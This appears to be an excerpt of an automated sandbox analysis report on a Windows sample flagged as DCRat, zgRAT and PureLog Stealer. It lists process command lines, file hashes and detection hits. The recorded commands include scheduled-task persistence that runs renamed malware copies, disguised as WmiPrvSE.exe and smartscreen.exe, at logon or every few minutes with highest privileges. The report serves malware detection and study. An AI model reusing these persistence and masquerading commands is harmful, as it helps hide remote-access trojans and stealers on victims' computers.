                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x440000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 7 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "r6cRyCpdfS" /sc ONLOGON /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat"
                                                                                                                          Imagebase:0x7ff757240000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Imagebase:0x160000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Imagebase:0xf0000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:chcp 65001
                                                                                                                          Imagebase:0x7ff651c10000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                                          Imagebase:0xe90000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 74%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:28
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                                          Imagebase:0xb50000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:29
                                                                                                                          Start time:16:32:04
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                          Imagebase:0x7ff7b9370000
                                                                                                                          File size:108'032 bytes
                                                                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:30
                                                                                                                          Start time:16:32:05
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\smartscreen.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\smartscreen.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\smartscreen.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 74%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:31
                                                                                                                          Start time:16:32:05
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\smartscreen.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                                          Imagebase:0x8a0000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:32
                                                                                                                          Start time:16:32:05
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Recovery\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                                          Imagebase:0xd70000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 74%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:33
                                                                                                                          Start time:16:32:05
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Recovery\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                                          Imagebase:0xce0000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:34
                                                                                                                          Start time:16:32:10
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                                          Imagebase:0xd50000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:37
                                                                                                                          Start time:16:32:14
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\smartscreen.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                                          Imagebase:0xf00000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:41
                                                                                                                          Start time:16:32:23
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Recovery\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Recovery\WmiPrvSE.exe"
                                                                                                                          Imagebase:0x210000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:42
                                                                                                                          Start time:16:32:33
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                                          Imagebase:0xc50000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:43
                                                                                                                          Start time:16:32:43
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                                          Imagebase:0x130000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B880D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1776671166.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 54ba64ed42b2675127b6fcbbcc149611030869f567920d3d183db159a9cc291a
                                                                                                                            • Instruction ID: 3b4eec6395bb37ebec27f66fdb63bd00d12554400b7c4b0c444c7e20774447c8
                                                                                                                            • Opcode Fuzzy Hash: 54ba64ed42b2675127b6fcbbcc149611030869f567920d3d183db159a9cc291a
                                                                                                                            • Instruction Fuzzy Hash: EF91F272A19A9D4FEB58DB6C8865BF97FE1FF99310F0401BED059D72E2CA7414018B01
                                                                                                                            Function 00007FFD9BC443AC Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1781275524.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bc40000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 0-2564639436
                                                                                                                            • Opcode ID: f3e06e1dc17432dc2ec6aaf1cb242494c9542808d6740123c2a26de04f7d7a0c
                                                                                                                            • Instruction ID: 3a6701b6f94920d42e5284f67b64be28248ff844141c7f417b21735c678a8e4c
                                                                                                                            • Opcode Fuzzy Hash: f3e06e1dc17432dc2ec6aaf1cb242494c9542808d6740123c2a26de04f7d7a0c
                                                                                                                            • Instruction Fuzzy Hash: 70C1F070A18A098FDB5DEF58D491A7973E2FF99300B2045BDD44AC72AADE34F9438781
                                                                                                                            Function 00007FFD9BFD16C8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1786441192.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bfd0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: a3b396ee414c45b644cf19cd54a6ea0d8ca38c6c587e57ff7222b3f2db235104
                                                                                                                            • Instruction ID: 5d5be52e130d447b1403074fef5850b69bcbe7946878b18a1694053deb61754d
                                                                                                                            • Opcode Fuzzy Hash: a3b396ee414c45b644cf19cd54a6ea0d8ca38c6c587e57ff7222b3f2db235104
                                                                                                                            • Instruction Fuzzy Hash: 5A515E71E0960E9FDB59DF98C4615BDB7B1EF84300F1542BAD01EE72A6DB356A02CB40
                                                                                                                            Function 00007FFD9BC4B048 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1781275524.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bc40000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: c0878f048677d18abf2aa54cc652826a855a30646e068ef73f2c43132fc780e4
                                                                                                                            • Instruction ID: df5c9ceee87c9caac4d480d1dc4062417a2c852b30ba06dbf59b332dd0b5b0b0
                                                                                                                            • Opcode Fuzzy Hash: c0878f048677d18abf2aa54cc652826a855a30646e068ef73f2c43132fc780e4
                                                                                                                            • Instruction Fuzzy Hash: 56516171E0954E8FDB68DFA8D4A45FDB7B2EF55300F1140BAD41AE7296CA392A01CB50
                                                                                                                            Function 00007FFD9BFDB9C8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1786441192.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bfd0000_r6cRyCpdfS.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: da33861e2d54b7f7faf6545b51e016217fd4dd1aa3085aa6df9b539db8a7a3c7
                                                                                                                            • Instruction ID: 649d43ebf08f43e2f86ec39af6cade6ae3d213279fb445f9c5f9e450964f0a09
                                                                                                                            • Opcode Fuzzy Hash: da33861e2d54b7f7faf6545b51e016217fd4dd1aa3085aa6df9b539db8a7a3c7
                                                                                                                            • Instruction Fuzzy Hash: 8D515071E0954E8FDB69DF98C4616BDB7B1EF84300F1142BAC019EB2A6DB352A01CB41
                                                                                                                            Function 00007FFD9BC418D8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1781275524.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
